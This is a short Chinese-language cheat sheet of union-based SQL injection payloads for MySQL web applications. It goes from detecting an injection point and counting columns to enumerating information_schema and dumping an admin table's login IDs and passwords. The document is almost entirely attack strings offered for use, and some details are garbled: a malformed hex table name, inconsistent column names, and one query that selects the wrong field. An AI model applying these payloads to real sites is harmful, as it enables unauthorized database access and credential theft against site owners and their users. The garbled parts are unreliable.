一、简易注入

0x1判断注入点

常用的有  and 1=1 and 1=2  ‘  "

0x2判断数据库类型

 and user>0 报错  and version()>0正常 则为mysql数据库

0x3猜解当前网页的字段数

order by num

0x4爆出当前网页显示位

and 1=2 union select 1,2,3,4,....,num --

0x5爆出数据库基本信息

//假设显示位为2

and 1=2 union select 1,concat(user(),0x20,database(),0x20,version()),3,4,...,num --

0x6爆出所有数据库名

//一般都有information_schema数据库

and 1=2 union select 1,group_concat(distinct+table_schema),3,4,...,num+from+information_schema.columns --

0x7爆出当前数据库表名

and 1=2 union select 1,group_concat(distinct+table_schema),3,4,...,num from information_schema.tables+where +table_schema=database() --

      爆出数据库所有表名

and 1=2 union select 1,group_concat(distinct+table_name),3,4,...,num from information_schema.tables+where +table_schema=database() --

0x8爆出当前数据库表字段

and 1=2 union select 1,group_concat(distinct+table_schema),3,4,...,num

from+information_schema.columns+where+table_name=0x544D5F41444D494E5F4D454D42552(该十六进制为TM_ADMIN_MEMBER) --

0x9爆出数据库表的数据

//这里假设爆出来的表的字段名为amdin_id login_id login_pwd

and 1=2 union select 1,group_concat(admin_id,0x2B,login_uid,0x2B,login_pwd),3,4,...,num

from+TM_ADMIN_MEMBER --

注入篇